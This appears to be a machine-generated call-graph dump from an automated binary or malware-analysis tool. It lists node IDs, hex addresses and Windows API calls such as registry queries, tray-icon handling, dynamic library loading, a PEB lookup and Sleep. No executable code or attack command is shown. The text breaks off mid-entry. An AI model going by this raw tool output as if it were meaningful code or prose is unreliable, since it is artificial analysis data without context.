95545->95546 95546->94529 95548 aaef2f 95547->95548 95549 aaef1d 95547->95549 95744 aecc5c 86 API calls 4 library calls 95548->95744 95711 aae3b0 95549->95711 95553 b186f9 95553->95553 95555 aaf130 95554->95555 95556 aafe30 331 API calls 95555->95556 95558 aaf199 95555->95558 95559 b18728 95556->95559 95557 b187c8 95756 aecc5c 86 API calls 4 library calls 95557->95756 95560 aaf595 95558->95560 95566 aad7f7 48 API calls 95558->95566 95601 aaf229 95558->95601 95607 aaf3dd 95558->95607 95559->95558 95753 aecc5c 86 API calls 4 library calls 95559->95753 95564 aad7f7 48 API calls 95560->95564 95605 aaf431 Mailbox 95560->95605 95561 aafe30 331 API calls 95561->95605 95565 b187a3 95564->95565 95755 ac0f0a 52 API calls __cinit 95565->95755 95568 b18772 95566->95568 95567 b18b1b 95586 b18b2c 95567->95586 95587 b18bcf 95567->95587 95754 ac0f0a 52 API calls __cinit 95568->95754 95569 aecc5c 86 API calls 95569->95605 95571 aaf3f2 95595 aaf418 95571->95595 95757 ae9af1 48 API calls 95571->95757 95573 aaf770 95575 aad6e9 55 API calls 95575->95605 95576 b18c53 95770 aecc5c 86 API calls 4 library calls 95576->95770 95577 b18810 95579 aafe30 331 API calls 95597 aaf6aa 95579->95597 95580 b18b7e 95765 afe40a 331 API calls Mailbox 95580->95765 95585 abc1af 48 API calls 95585->95605 95588 b18beb 95768 afbdbd 331 API calls Mailbox 95588->95768 95591 ab1b90 48 API calls 95591->95605 95595->95567 95595->95597 95595->95605 95597->95573 95597->95579 95598 aafce0 95597->95598 95597->95605 95618 aaf537 Mailbox 95597->95618 95598->95618 95766 aecc5c 86 API calls 4 library calls 95598->95766 95601->95560 95601->95595 95601->95605 95601->95607 95605->95561 95605->95569 95605->95575 95605->95576 95605->95580 95605->95585 95605->95588 95605->95591 95605->95598 95605->95618 95752 aadd47 48 API calls ___crtGetEnvironmentStringsW 95605->95752 95763 ad97ed InterlockedDecrement 95605->95763 95607->95557 95607->95571 95607->95605 95618->94590 95620 ab479f 95619->95620 95621 ab4637 95619->95621 95622 aace19 48 API calls 95620->95622 95623 b16e05 95621->95623 95624 ab4643 95621->95624 95631 ab46e4 Mailbox 95622->95631 95825 afe822 95623->95825 95824 ab4300 331 API calls ___crtGetEnvironmentStringsW 95624->95824 95627 b16e11 95628 ab4739 Mailbox 95627->95628 95865 aecc5c 86 API calls 4 library calls 95627->95865 95628->94590 95630 ab4659 95630->95627 95630->95628 95630->95631 95771 ae6524 95631->95771 95774 aefa0c 95631->95774 95815 af6ff0 95631->95815 95636 aabd30 49 API calls 95635->95636 95637 ab3267 95636->95637 95650 ab3313 Mailbox ___crtGetEnvironmentStringsW 95637->95650 95981 abc36b 86 API calls 95637->95981 95639 abc3c3 48 API calls 95639->95650 95642 aecc5c 86 API calls 95642->95650 95643 aad645 53 API calls 95643->95650 95646 aad6e9 55 API calls 95646->95650 95649 aafe30 331 API calls 95649->95650 95650->95639 95650->95642 95650->95643 95650->95646 95650->95649 95652 aadcae 50 API calls 95650->95652 95655 aae8d0 331 API calls 95650->95655 95656 abc2d6 48 API calls 95650->95656 95657 abf4ea 48 API calls 95650->95657 95658 aa6eed 48 API calls 95650->95658 95660 ab3635 Mailbox 95650->95660 95974 aa2b7a 95650->95974 95982 aad9a0 53 API calls __cinit 95650->95982 95983 aad8c0 53 API calls 95650->95983 95984 aff320 331 API calls 95650->95984 95985 aff5ee 331 API calls 95650->95985 95986 aa1caa 49 API calls 95650->95986 95987 afcda2 82 API calls Mailbox 95650->95987 95988 ae80e3 53 API calls 95650->95988 95989 aad764 55 API calls 95650->95989 95990 aec942 50 API calls 95650->95990 95652->95650 95655->95650 95656->95650 95657->95650 95658->95650 95660->94590 95662 b1df42 95661->95662 95665 abe253 95661->95665 95663 b1df77 95662->95663 95664 b1df59 TranslateAcceleratorW 95662->95664 95664->95665 95665->94590 95667 abdca3 95666->95667 95668 abdc71 95666->95668 95667->94590 95668->95667 95669 abdc96 IsDialogMessageW 95668->95669 95670 b1dd1d GetClassLongW 95668->95670 95669->95667 95669->95668 95670->95668 95670->95669 95671->94590 95672->94543 95673->94537 95674->94542 95675->94590 95676->94585 95677->94585 95678->94585 95680 aafe50 95679->95680 95704 aafe7e 95679->95704 95681 abf4ea 48 API calls 95680->95681 95681->95704 95682 ac0f0a 52 API calls __cinit 95682->95704 95683 ab146e 95684 aa6eed 48 API calls 95683->95684 95705 aaffe1 95684->95705 95685 ad97ed InterlockedDecrement 95685->95704 95687 ab0509 96010 aecc5c 86 API calls 4 library calls 95687->96010 95688 abf4ea 48 API calls 95688->95704 95690 aa6eed 48 API calls 95690->95704 95692 ab1473 96009 aecc5c 86 API calls 4 library calls 95692->96009 95693 b1a922 95693->94590 95694 b1a246 95696 aa6eed 48 API calls 95694->95696 95696->95705 95698 aad7f7 48 API calls 95698->95704 95699 b1a873 95699->94590 95700 b1a30e 95700->95705 96007 ad97ed InterlockedDecrement 95700->96007 95702 b1a973 96011 aecc5c 86 API calls 4 library calls 95702->96011 95704->95682 95704->95683 95704->95685 95704->95687 95704->95688 95704->95690 95704->95692 95704->95694 95704->95698 95704->95700 95704->95702 95704->95705 95707 ab15b5 95704->95707 95992 ab1d10 95704->95992 96006 ab1820 331 API calls 2 library calls 95704->96006 95705->94590 95706 b1a982 96008 aecc5c 86 API calls 4 library calls 95707->96008 95708->94585 95709->94585 95710->94585 95712 aafe30 331 API calls 95711->95712 95714 aae3ef 95712->95714 95713 b17bd2 95751 aecc5c 86 API calls 4 library calls 95713->95751 95714->95713 95718 aae80b Mailbox 95714->95718 95727 aae44c ___crtGetEnvironmentStringsW 95714->95727 95739 aae609 95714->95739 95717 aae450 95723 abf4ea 48 API calls 95718->95723 95720 abf4ea 48 API calls 95720->95727 95727->95717 95727->95718 95727->95720 95729 aae597 95727->95729 95727->95739 95729->95718 95744->95553 95752->95605 95753->95558 95754->95601 95755->95605 95756->95618 95757->95577 95763->95605 95765->95598 95766->95618 95770->95618 95866 ae6ca9 GetFileAttributesW 95771->95866 95775 aefa1c __ftell_nolock 95774->95775 95776 aefa44 95775->95776 95926 aad286 48 API calls 95775->95926 95816 aa936c 81 API calls 95815->95816 95817 af702a 95816->95817 95824->95630 95826 afe84e 95825->95826 95827 afe868 95825->95827 95966 aecc5c 86 API calls 4 library calls 95826->95966 95967 afccdc 48 API calls 95827->95967 95830 afe871 95864 afe860 Mailbox 95864->95627 95865->95628 95926->95776 95966->95864 95967->95830 95975 aa2b8b 95974->95975 95976 b1436a 95974->95976 95977 abf4ea 48 API calls 95975->95977 95981->95650 95982->95650 95983->95650 95984->95650 95985->95650 95986->95650 95987->95650 95988->95650 95989->95650 95990->95650 95993 ab1d2a 95992->95993 95997 ab1ed6 95992->95997 95994 ab2357 95993->95994 95993->95997 95998 ab1e0b 95993->95998 95999 ab1eba 95993->95999 95994->95999 96015 ae9f44 58 API calls wcstoxq 95994->96015 95996 ab1f55 95996->95999 96004 ab1e9a Mailbox 95996->96004 96013 ad97ed InterlockedDecrement 95996->96013 95997->95994 95997->95996 95997->95999 95997->96004 95998->95996 95998->95999 96000 ab1e47 95998->96000 95999->95704 96000->95999 96002 b1bfc4 96000->96002 96000->96004 96004->95999 96014 ac203b 58 API calls __wtof_l 96004->96014 96006->95704 96007->95705 96008->95705 96009->95699 96010->95693 96011->95706 96013->96004 96014->95999 96015->95999 96016 b19c06 96027 abd3be 96016->96027 96018 b19c1c 96020 b19c91 Mailbox 96018->96020 96036 aa1caa 49 API calls 96018->96036 96021 ab3200 331 API calls 96020->96021 96023 b19cc5 96021->96023 96024 b1a7ab Mailbox 96023->96024 96038 aecc5c 86 API calls 4 library calls 96023->96038 96025 b19c71 96025->96023 96037 aeb171 48 API calls 96025->96037 96028 abd3ca 96027->96028 96029 abd3dc 96027->96029 96039 aadcae 50 API calls Mailbox 96028->96039 96030 abd40b 96029->96030 96031 abd3e2 96029->96031 96040 aadcae 50 API calls Mailbox 96030->96040 96033 abf4ea 48 API calls 96031->96033 96035 abd3d4 96033->96035 96035->96018 96036->96025 96037->96020 96038->96024 96039->96035 96040->96035 93645 aa3742 93646 aa374b 93645->93646 93647 aa37c8 93646->93647 93648 aa3769 93646->93648 93684 aa37c6 93646->93684 93652 b11e00 93647->93652 93653 aa37ce 93647->93653 93649 aa382c PostQuitMessage 93648->93649 93650 aa3776 93648->93650 93687 aa37b9 93649->93687 93655 b11e88 93650->93655 93656 aa3781 93650->93656 93651 aa37ab DefWindowProcW 93651->93687 93700 aa2ff6 16 API calls 93652->93700 93657 aa37d3 93653->93657 93658 aa37f6 SetTimer RegisterWindowMessageW 93653->93658 93715 ae4ddd 60 API calls _memset 93655->93715 93660 aa3789 93656->93660 93661 aa3836 93656->93661 93664 aa37da KillTimer 93657->93664 93665 b11da3 93657->93665 93662 aa381f CreatePopupMenu 93658->93662 93658->93687 93659 b11e27 93701 abe312 331 API calls Mailbox 93659->93701 93668 b11e6d 93660->93668 93669 aa3794 93660->93669 93690 abeb83 93661->93690 93662->93687 93697 aa3847 Shell_NotifyIconW _memset 93664->93697 93672 b11da8 93665->93672 93673 b11ddc MoveWindow 93665->93673 93668->93651 93714 ada5f3 48 API calls 93668->93714 93675 b11e58 93669->93675 93680 aa379f 93669->93680 93670 b11e9a 93670->93651 93670->93687 93676 b11dcb SetFocus 93672->93676 93677 b11dac 93672->93677 93673->93687 93674 aa37ed 93698 aa390f DeleteObject DestroyWindow Mailbox 93674->93698 93713 ae55bd 70 API calls _memset 93675->93713 93676->93687 93677->93680 93681 b11db5 93677->93681 93680->93651 93702 aa3847 Shell_NotifyIconW _memset 93680->93702 93699 aa2ff6 16 API calls 93681->93699 93683 b11e68 93683->93687 93684->93651 93688 b11e4c 93703 aa4ffc 93688->93703 93691 abeb9a _memset 93690->93691 93692 abec1c 93690->93692 93716 aa51af 93691->93716 93692->93687 93694 abec05 KillTimer SetTimer 93694->93692 93695 abebc1 93695->93694 93696 b13c7a Shell_NotifyIconW 93695->93696 93696->93694 93697->93674 93698->93687 93699->93687 93700->93659 93701->93680 93702->93688 93704 aa5027 _memset 93703->93704 93859 aa4c30 93704->93859 93707 aa50ac 93709 aa50ca Shell_NotifyIconW 93707->93709 93710 b13d28 Shell_NotifyIconW 93707->93710 93711 aa51af 50 API calls 93709->93711 93712 aa50df 93711->93712 93712->93684 93713->93683 93714->93684 93715->93670 93717 aa51cb 93716->93717 93718 aa52a2 Mailbox 93716->93718 93738 aa6b0f 93717->93738 93718->93695 93721 b13ca1 LoadStringW 93725 b13cbb 93721->93725 93722 aa51e6 93743 aa6a63 93722->93743 93724 aa51fb 93724->93725 93726 aa520c 93724->93726 93727 aa510d 48 API calls 93725->93727 93728 aa5216 93726->93728 93729 aa52a7 93726->93729 93732 b13cc5 93727->93732 93754 aa510d 93728->93754 93763 aa6eed 93729->93763 93735 aa5220 _memset _wcscpy 93732->93735 93767 aa518c 93732->93767 93734 b13ce7 93737 aa518c 48 API calls 93734->93737 93736 aa5288 Shell_NotifyIconW 93735->93736 93736->93718 93737->93735 93777 abf4ea 93738->93777 93740 aa6b34 93786 aa6b4a 93740->93786 93744 aa6adf 93743->93744 93746 aa6a6f __NMSG_WRITE 93743->93746 93821 aab18b 93744->93821 93748 aa6a8b 93746->93748 93749 aa6ad7 93746->93749 93747 aa6ab6 ___crtGetEnvironmentStringsW 93747->93724 93751 aa6b4a 48 API calls 93748->93751 93820 aac369 48 API calls 93749->93820 93752 aa6a95 93751->93752 93811 abee75 93752->93811 93755 aa511f 93754->93755 93756 b11be7 93754->93756 93833 aab384 93755->93833 93842 ada58f 48 API calls ___crtGetEnvironmentStringsW 93756->93842 93759 aa512b 93759->93735 93760 b11bf1 93761 aa6eed 48 API calls 93760->93761 93762 b11bf9 Mailbox 93761->93762 93764 aa6ef8 93763->93764 93765 aa6f00 93763->93765 93848 aadd47 48 API calls ___crtGetEnvironmentStringsW 93764->93848 93765->93735 93768 aa5197 93767->93768 93769 aa519f 93768->93769 93770 b11ace 93768->93770 93849 aa5130 93769->93849 93771 aa6b4a 48 API calls 93770->93771 93774 b11adb __NMSG_WRITE 93771->93774 93773 aa51aa 93773->93734 93775 abee75 48 API calls 93774->93775 93776 b11b07 ___crtGetEnvironmentStringsW 93775->93776 93780 abf4f2 __calloc_impl 93777->93780 93779 abf50c 93779->93740 93780->93779 93781 abf50e std::exception::exception 93780->93781 93789 ac395c 93780->93789 93803 ac6805 RaiseException 93781->93803 93783 abf538 93804 ac673b 47 API calls _free 93783->93804 93785 abf54a 93785->93740 93787 abf4ea 48 API calls 93786->93787 93788 aa51d9 93787->93788 93788->93721 93788->93722 93790 ac39d7 __calloc_impl 93789->93790 93793 ac3968 __calloc_impl 93789->93793 93810 ac7c0e 47 API calls __getptd_noexit 93790->93810 93791 ac3973 93791->93793 93805 ac81c2 47 API calls __NMSG_WRITE 93791->93805 93806 ac821f 47 API calls 5 library calls 93791->93806 93807 ac1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93791->93807 93793->93791 93795 ac399b RtlAllocateHeap 93793->93795 93798 ac39c3 93793->93798 93801 ac39c1 93793->93801 93795->93793 93796 ac39cf 93795->93796 93796->93780 93808 ac7c0e 47 API calls __getptd_noexit 93798->93808 93809 ac7c0e 47 API calls __getptd_noexit 93801->93809 93803->93783 93804->93785 93805->93791 93806->93791 93808->93801 93809->93796 93810->93796 93813 abf4ea __calloc_impl 93811->93813 93812 ac395c __malloc_crt 47 API calls 93812->93813 93813->93812 93814 abf50c 93813->93814 93815 abf50e std::exception::exception 93813->93815 93814->93747 93825 ac6805 RaiseException 93815->93825 93817 abf538 93826 ac673b 47 API calls _free 93817->93826 93819 abf54a 93819->93747 93820->93747 93822 aab199 93821->93822 93824 aab1a2 ___crtGetEnvironmentStringsW 93821->93824 93822->93824 93827 aabdfa 93822->93827 93824->93747 93825->93817 93826->93819 93828 aabe0d 93827->93828 93832 aabe0a ___crtGetEnvironmentStringsW 93827->93832 93829 abf4ea 48 API calls 93828->93829 93830 aabe17 93829->93830 93831 abee75 48 API calls 93830->93831 93831->93832 93832->93824 93834 aab392 93833->93834 93835 aab3c5 ___crtGetEnvironmentStringsW 93833->93835 93834->93835 93836 aab3b8 93834->93836 93837 aab3fd 93834->93837 93835->93759 93835->93835 93843 aabb85 93836->93843 93838 abf4ea 48 API calls 93837->93838 93840 aab407 93838->93840 93841 abf4ea 48 API calls 93840->93841 93841->93835 93842->93760 93845 aabb9b 93843->93845 93847 aabb96 ___crtGetEnvironmentStringsW 93843->93847 93844 b11b77 93845->93844 93846 abee75 48 API calls 93845->93846 93846->93847 93847->93835 93848->93765 93850 aa513f __NMSG_WRITE 93849->93850 93851 b11b27 93850->93851 93852 aa5151 93850->93852 93854 aa6b4a 48 API calls 93851->93854 93853 aabb85 48 API calls 93852->93853 93855 aa515e ___crtGetEnvironmentStringsW 93853->93855 93856 b11b34 93854->93856 93855->93773 93857 abee75 48 API calls 93856->93857 93858 b11b57 ___crtGetEnvironmentStringsW 93857->93858 93860 b13c33 93859->93860 93861 aa4c44 93859->93861 93860->93861 93862 b13c3c DestroyIcon 93860->93862 93861->93707 93863 ae5819 61 API calls _W_store_winword 93861->93863 93862->93861 93863->93707 93864 b18eb8 93868 aea635 93864->93868 93866 b18ec3 93867 aea635 84 API calls 93866->93867 93867->93866 93874 aea642 93868->93874 93875 aea66f 93868->93875 93869 aea671 93900 abec4e 81 API calls 93869->93900 93871 aea676 93879 aa936c 93871->93879 93873 aea67d 93876 aa510d 48 API calls 93873->93876 93874->93869 93874->93871 93874->93875 93877 aea669 93874->93877 93875->93866 93876->93875 93899 ab4525 61 API calls ___crtGetEnvironmentStringsW 93877->93899 93880 aa9384 93879->93880 93894 aa9380 93879->93894 93881 b14cbd __i64tow 93880->93881 93882 aa9398 93880->93882 93883 b14bbf 93880->93883 93890 aa93b0 __itow Mailbox _wcscpy 93880->93890 93901 ac172b 80 API calls 3 library calls 93882->93901 93884 b14ca5 93883->93884 93885 b14bc8 93883->93885 93908 ac172b 80 API calls 3 library calls 93884->93908 93885->93890 93891 b14be7 93885->93891 93887 abf4ea 48 API calls 93889 aa93ba 93887->93889 93889->93894 93902 aace19 93889->93902 93890->93887 93893 abf4ea 48 API calls 93891->93893 93895 b14c04 93893->93895 93894->93873 93896 abf4ea 48 API calls 93895->93896 93897 b14c2a 93896->93897 93897->93894 93898 aace19 48 API calls 93897->93898 93898->93894 93899->93875 93900->93871 93901->93890 93903 aace28 __NMSG_WRITE 93902->93903 93904 abee75 48 API calls 93903->93904 93905 aace50 ___crtGetEnvironmentStringsW 93904->93905 93906 abf4ea 48 API calls 93905->93906 93907 aace66 93906->93907 93907->93894 93908->93890 93909 b1197b 93914 abdd94 93909->93914 93913 b1198a 93915 abf4ea 48 API calls 93914->93915 93916 abdd9c 93915->93916 93917 abddb0 93916->93917 93922 abdf3d 93916->93922 93921 ac0f0a 52 API calls __cinit 93917->93921 93921->93913 93923 abdda8 93922->93923 93924 abdf46 93922->93924 93926 abddc0 93923->93926 93954 ac0f0a 52 API calls __cinit 93924->93954 93955 aad7f7 93926->93955 93929 aa6a63 48 API calls 93930 abde1a 93929->93930 93960 abdfb4 93930->93960 93936 b124c8 93937 abdea4 GetCurrentProcess 93977 abdf5f LoadLibraryA GetProcAddress 93937->93977 93940 abdee3 93971 abe00c 93940->93971 93941 abdf31 GetSystemInfo 93942 abdf0e 93941->93942 93944 abdf1c FreeLibrary 93942->93944 93945 abdf21 93942->93945 93944->93945 93945->93917 93947 abdf29 GetSystemInfo 93950 abdf03 93947->93950 93948 abdef9 93974 abdff4 93948->93974 93950->93942 93953 abdf09 FreeLibrary 93950->93953 93951 abdebb 93951->93940 93951->93941 93953->93942 93954->93923 93956 abf4ea 48 API calls 93955->93956 93957 aad818 93956->93957 93958 abf4ea 48 API calls 93957->93958 93959 aad826 GetVersionExW 93958->93959 93959->93929 93961 abdfbd 93960->93961 93962 aab18b 48 API calls 93961->93962 93963 abde22 93962->93963 93964 aa6571 93963->93964 93965 aa657f 93964->93965 93966 aab18b 48 API calls 93965->93966 93967 aa658f 93966->93967 93967->93936 93968 abdf77 93967->93968 93978 abdf89 93968->93978 93982 abe01e 93971->93982 93975 abe00c 2 API calls 93974->93975 93976 abdf01 GetNativeSystemInfo 93975->93976 93976->93950 93977->93951 93979 abdea0 93978->93979 93980 abdf92 LoadLibraryA 93978->93980 93979->93937 93979->93951 93980->93979 93981 abdfa3 GetProcAddress 93980->93981 93981->93979 93983 abdef1 93982->93983 93984 abe027 LoadLibraryA 93982->93984 93983->93947 93983->93948 93984->93983 93985 abe038 GetProcAddress 93984->93985 93985->93983 96041 aaf030 96044 ab3b70 96041->96044 96043 aaf03c 96045 ab3bc8 96044->96045 96099 ab42a5 96044->96099 96046 ab3bef 96045->96046 96048 b16fd1 96045->96048 96051 b16f7e 96045->96051 96057 b16f9b 96045->96057 96047 abf4ea 48 API calls 96046->96047 96049 ab3c18 96047->96049 96124 afceca 331 API calls Mailbox 96048->96124 96052 abf4ea 48 API calls 96049->96052 96051->96046 96053 b16f87 96051->96053 96105 ab3c2c __NMSG_WRITE ___crtGetEnvironmentStringsW 96052->96105 96121 afd552 331 API calls Mailbox 96053->96121 96054 b16fbe 96123 aecc5c 86 API calls 4 library calls 96054->96123 96057->96054 96122 afda0e 331 API calls 2 library calls 96057->96122 96060 b173b0 96060->96043 96061 b1737a 96142 aecc5c 86 API calls 4 library calls 96061->96142 96062 b17297 96132 aecc5c 86 API calls 4 library calls 96062->96132 96067 b1707e 96125 aecc5c 86 API calls 4 library calls 96067->96125 96069 aad6e9 55 API calls 96069->96105 96072 ab40df 96133 aecc5c 86 API calls 4 library calls 96072->96133 96073 abdce0 53 API calls 96073->96105 96074 aad645 53 API calls 96074->96105 96077 b172d2 96134 aecc5c 86 API calls 4 library calls 96077->96134 96078 aafe30 331 API calls 96078->96105 96080 b17350 96140 aecc5c 86 API calls 4 library calls 96080->96140 96082 b172e9 96135 aecc5c 86 API calls 4 library calls 96082->96135 96083 b17363 96141 aecc5c 86 API calls 4 library calls 96083->96141 96085 ab42f2 96143 aecc5c 86 API calls 4 library calls 96085->96143 96088 aa6a63 48 API calls 96088->96105 96090 b1714c 96129 afccdc 48 API calls 96090->96129 96091 abf4ea 48 API calls 96091->96105 96092 abc050 48 API calls 96092->96105 96094 ab3f2b 96094->96043 96095 b1733f 96139 aecc5c 86 API calls 4 library calls 96095->96139 96097 aad286 48 API calls 96097->96105 96136 aecc5c 86 API calls 4 library calls 96099->96136 96100 b171a1 96131 abc15c 48 API calls 96100->96131 96101 abee75 48 API calls 96101->96105 96102 aa6eed 48 API calls 96102->96105 96105->96061 96105->96062 96105->96067 96105->96069 96105->96072 96105->96073 96105->96074 96105->96077 96105->96078 96105->96080 96105->96082 96105->96083 96105->96085 96105->96088 96105->96090 96105->96091 96105->96092 96105->96094 96105->96095 96105->96097 96105->96099 96105->96101 96105->96102 96107 b171e1 96105->96107 96116 aad9a0 53 API calls __cinit 96105->96116 96117 aad83d 53 API calls 96105->96117 96118 aacdb9 48 API calls 96105->96118 96119 abc15c 48 API calls 96105->96119 96120 abbecb 331 API calls 96105->96120 96126 aadcae 50 API calls Mailbox 96105->96126 96127 afccdc 48 API calls 96105->96127 96128 aea1eb 50 API calls 96105->96128 96107->96094 96138 aecc5c 86 API calls 4 library calls 96107->96138 96109 b1715f 96109->96100 96130 afccdc 48 API calls 96109->96130 96110 b171ce 96111 abc050 48 API calls 96110->96111 96113 b171d6 96111->96113 96112 b171ab 96112->96099 96112->96110 96113->96107 96114 b17313 96113->96114 96137 aecc5c 86 API calls 4 library calls 96114->96137 96116->96105 96117->96105 96118->96105 96119->96105 96120->96105 96121->96094 96122->96054 96123->96048 96124->96105 96125->96094 96126->96105 96127->96105 96128->96105 96129->96109 96130->96109 96131->96112 96132->96072 96133->96094 96134->96082 96135->96094 96136->96094 96137->96094 96138->96094 96139->96094 96140->96094 96141->96094 96142->96094 96143->96060 96144 b119cb 96149 aa2322 96144->96149 96146 b119d1 96182 ac0f0a 52 API calls __cinit 96146->96182 96148 b119db 96150 aa2344 96149->96150 96183 aa26df 96150->96183 96155 aad7f7 48 API calls 96156 aa2384 96155->96156 96157 aad7f7 48 API calls 96156->96157 96158 aa238e 96157->96158 96159 aad7f7 48 API calls 96158->96159 96160 aa2398 96159->96160 96161 aad7f7 48 API calls 96160->96161 96162 aa23de 96161->96162 96163 aad7f7 48 API calls 96162->96163 96164 aa24c1 96163->96164 96191 aa263f 96164->96191 96168 aa24f1 96169 aad7f7 48 API calls 96168->96169 96170 aa24fb 96169->96170 96220 aa2745 96170->96220 96172 aa2546 96173 aa2556 GetStdHandle 96172->96173 96174 aa25b1 96173->96174 96175 b1501d 96173->96175 96176 aa25b7 CoInitialize 96174->96176 96175->96174 96177 b15026 96175->96177 96176->96146 96227 ae92d4 53 API calls 96177->96227 96179 b1502d 96228 ae99f9 CreateThread 96179->96228 96181 b15039 CloseHandle 96181->96176 96182->96148 96229 aa2854 96183->96229 96186 aa6a63 48 API calls 96187 aa234a 96186->96187 96188 aa272e 96187->96188 96243 aa27ec 6 API calls 96188->96243 96190 aa237a 96190->96155 96192 aad7f7 48 API calls 96191->96192 96193 aa264f 96192->96193 96194 aad7f7 48 API calls 96193->96194 96195 aa2657 96194->96195 96244 aa26a7 96195->96244 96198 aa26a7 48 API calls 96199 aa2667 96198->96199 96200 aad7f7 48 API calls 96199->96200 96201 aa2672 96200->96201 96202 abf4ea 48 API calls 96201->96202 96203 aa24cb 96202->96203 96204 aa22a4 96203->96204 96205 aa22b2 96204->96205 96206 aad7f7 48 API calls 96205->96206 96207 aa22bd 96206->96207 96208 aad7f7 48 API calls 96207->96208 96209 aa22c8 96208->96209 96210 aad7f7 48 API calls 96209->96210 96211 aa22d3 96210->96211 96212 aad7f7 48 API calls 96211->96212 96213 aa22de 96212->96213 96214 aa26a7 48 API calls 96213->96214 96215 aa22e9 96214->96215 96216 abf4ea 48 API calls 96215->96216 96217 aa22f0 96216->96217 96218 aa22f9 RegisterWindowMessageW 96217->96218 96219 b11fe7 96217->96219 96218->96168 96221 b15f4d 96220->96221 96222 aa2755 96220->96222 96249 aec942 50 API calls 96221->96249 96224 abf4ea 48 API calls 96222->96224 96226 aa275d 96224->96226 96225 b15f58 96226->96172 96227->96179 96228->96181 96250 ae99df 54 API calls 96228->96250 96236 aa2870 96229->96236 96232 aa2870 48 API calls 96233 aa2864 96232->96233 96234 aad7f7 48 API calls 96233->96234 96235 aa2716 96234->96235 96235->96186 96237 aad7f7 48 API calls 96236->96237 96238 aa287b 96237->96238 96239 aad7f7 48 API calls 96238->96239 96240 aa2883 96239->96240 96241 aad7f7 48 API calls 96240->96241 96242 aa285c 96241->96242 96242->96232 96243->96190 96245 aad7f7 48 API calls 96244->96245 96246 aa26b0 96245->96246 96247 aad7f7 48 API calls 96246->96247 96248 aa265f 96247->96248 96248->96198 96249->96225 93986 1339598 94000 13371e8 93986->94000 93988 133968d 94003 1339488 93988->94003 94006 133a6b8 GetPEB 94000->94006 94002 1337873 94002->93988 94004 1339491 Sleep 94003->94004 94005 133949f 94004->94005 94007 133a6e2 94006->94007 94007->94002 94008 b119ba 94013 abc75a 94008->94013 94012 b119c9 94014 aad7f7 48 API calls 94013->94014 94015 abc7c8 94014->94015 94021 abd26c 94015->94021 94018 abc865 94019 abc881 94018->94019 94024 abd1fa 48 API calls ___crtGetEnvironmentStringsW 94018->94024 94020 ac0f0a 52 API calls __cinit 94019->94020 94020->94012 94025 abd298 94021->94025 94024->94018 94026 abd28b 94025->94026 94027 abd2a5 94025->94027 94026->94018 94027->94026 94028 abd2ac RegOpenKeyExW 94027->94028 94028->94026 94029 abd2c6 RegQueryValueExW 94028->94029 94030 abd2fc RegCloseKey 94029->94030 94031 abd2e7 94029->94031 94030->94026 94031->94030 94032 b119dd 94037 aa4a30 94032->94037 94034 b119f1 94057 ac0f0a 52 API calls __cinit 94034->94057 94036 b119fb 94038 aa4a40 __ftell_nolock 94037->94038 94039 aad7f7 48 API calls 94038->94039 94040 aa4af6 94039->94040 94058 aa5374 94040->94058 94042 aa4aff 94065 aa363c 94042->94065 94045 aa518c 48 API calls 94046 aa4b18 94045->94046 94071 aa64cf 94046->94071 94049 aad7f7 48 API calls 94050 aa4b32 94049->94050 94077 aa49fb 94050->94077 94052 aa4b43 Mailbox 94052->94034 94053 aa61a6 48 API calls 94056 aa4b3d _wcscat Mailbox __NMSG_WRITE 94053->94056 94054 aace19 48 API calls 94054->94056 94055 aa64cf 48 API calls 94055->94056 94056->94052 94056->94053 94056->94054 94056->94055 94057->94036 94091 acf8a0 94058->94091 94061 aace19 48 API calls 94062 aa53a7 94061->94062 94093 aa660f 94062->94093 94064 aa53b1 Mailbox 94064->94042 94066 aa3649 __ftell_nolock 94065->94066 94100 aa366c GetFullPathNameW 94066->94100 94068 aa365a 94069 aa6a63 48 API calls 94068->94069 94070 aa3669 94069->94070 94070->94045 94073 aa651b 94071->94073 94076 aa64dd ___crtGetEnvironmentStringsW 94071->94076 94072 abf4ea 48 API calls 94074 aa4b29 94072->94074 94075 abf4ea 48 API calls 94073->94075 94074->94049 94075->94076 94076->94072 94102 aabcce 94077->94102 94080 aa4a2b 94080->94056 94081 b141cc RegQueryValueExW 94082 b141e5 94081->94082 94083 b14246 RegCloseKey 94081->94083 94084 abf4ea 48 API calls 94082->94084 94085 b141fe 94084->94085 94108 aa47b7 94085->94108 94088 b14224 94090 aa6a63 48 API calls 94088->94090 94089 b1423b 94089->94083 94090->94089 94092 aa5381 GetModuleFileNameW 94091->94092 94092->94061 94094 acf8a0 __ftell_nolock 94093->94094 94095 aa661c GetFullPathNameW 94094->94095 94096 aa6a63 48 API calls 94095->94096 94097 aa6643 94096->94097 94098 aa6571 48 API calls 94097->94098 94099 aa664f 94098->94099 94099->94064 94101 aa368a 94100->94101 94101->94068 94103 aabce8 94102->94103 94107 aa4a0a RegOpenKeyExW 94102->94107 94104 abf4ea 48 API calls 94103->94104 94105 aabcf2 94104->94105 94106 abee75 48 API calls 94105->94106 94106->94107 94107->94080 94107->94081 94109 abf4ea 48 API calls 94108->94109 94110 aa47c9 RegQueryValueExW 94109->94110 94110->94088 94110->94089 96251 b19bec 96289 ab0ae0 Mailbox ___crtGetEnvironmentStringsW 96251->96289 96255 ab146e 96266 aa6eed 48 API calls 96255->96266 96256 ab1d10 59 API calls 96276 aafec8 96256->96276 96258 ab0509 96350 aecc5c 86 API calls 4 library calls 96258->96350 96259 aa6eed 48 API calls 96259->96276 96261 abf4ea 48 API calls 96261->96276 96263 b1a922 96264 ab1473 96349 aecc5c 86 API calls 4 library calls 96264->96349 96265 b1a246 96267 aa6eed 48 API calls 96265->96267 96280 aaffe1 Mailbox 96266->96280 96267->96280 96270 ad97ed InterlockedDecrement 96270->96276 96271 b1a873 96272 b1a30e 96272->96280 96345 ad97ed InterlockedDecrement 96272->96345 96273 aad7f7 48 API calls 96273->96276 96274 aace19 48 API calls 96274->96289 96276->96255 96276->96256 96276->96258 96276->96259 96276->96261 96276->96264 96276->96265 96276->96270 96276->96272 96276->96273 96277 b1a973 96276->96277 96278 ac0f0a 52 API calls __cinit 96276->96278 96276->96280 96282 ab15b5 96276->96282 96343 ab1820 331 API calls 2 library calls 96276->96343 96351 aecc5c 86 API calls 4 library calls 96277->96351 96278->96276 96281 b1a982 96348 aecc5c 86 API calls 4 library calls 96282->96348 96283 afe822 331 API calls 96283->96289 96284 abf4ea 48 API calls 96284->96289 96285 aafe30 331 API calls 96285->96289 96286 b1a706 96346 aecc5c 86 API calls 4 library calls 96286->96346 96288 ab1526 Mailbox 96347 